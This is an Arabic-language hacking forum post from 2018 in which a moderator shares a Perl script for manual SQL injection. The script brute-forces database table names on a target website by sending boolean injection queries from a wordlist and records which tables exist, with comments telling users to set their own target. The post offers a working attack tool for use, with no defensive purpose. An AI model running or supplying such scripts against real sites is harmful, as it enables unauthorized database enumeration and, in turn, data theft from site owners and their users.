التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قسم البرمجة ولغاتها .:: ] > برمجة السكربتات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 04-23-2018, 01:34 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
L3issabaNet
::. Moderators .::
 
الصورة الرمزية L3issabaNet
 

 

 
إحصائية العضو





L3issabaNet غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
L3issabaNet is on a distinguished road

افتراضي SQLI TABLES FINDER


السلام عليكم ورحمة الله

لمحبي الحقن اليدوي

طريقة للتخمين على التايبلز

بالتوفيق

كود:
    use strict;
    use warnings;
    use LWP::UserAgent;
    use HTTP::Request::Common;
     
    system('cls');
print '
  ____       _____     _____  
 / __"| u   |_ " _|   |" ___| 
<\___ \/      | |    U| |_  u 
 u___) |     /| |\   \|  _|/  
 |____/>>   u |_|U    |_|     
  )(  (__)  _// \\_   )(\\,-  
 (__)      (__) (__) (__)(_/  
';
print "\n Sql  TABLES  Finder\n";
    
    print "List Of  TABLES  -> ";
    my $tables = <STDIN>;
    chomp($tables);
    open (TABLESFILE, "<$tables") || die "[-] Can't Found ($tables) !";
    my @tables = <TABLESFILE>;
    close TABLESFILE;
    system('clear');
    system('cls');
    print "Cracking Now !...\n";

        foreach my $table (@tables) {
        chomp $table;
                my $UserAgent = LWP::UserAgent->new;
                my $sql = "https://www.site.com/path/-id and (SELECT 1 from $table )=1"; #change to your targer
                my $request = HTTP::Request->new(GET => $sql);
                my $reponse = $UserAgent->request($request);
                #print $sql;
                if ($reponse->content =~m/SQL/) { #change to your specific string
                    print "Table doesn't exist => ($table)\n";
                }
                else{
                    print " Table exist => ($table)\n";
                    open(LNT,">>tables_exists.txt");
                    print LNT "$table\n";
                    close(LNT);}
    }



SQLI TABLES FINDER

التوقيع

استغفر الله العضيم

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 12:04 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0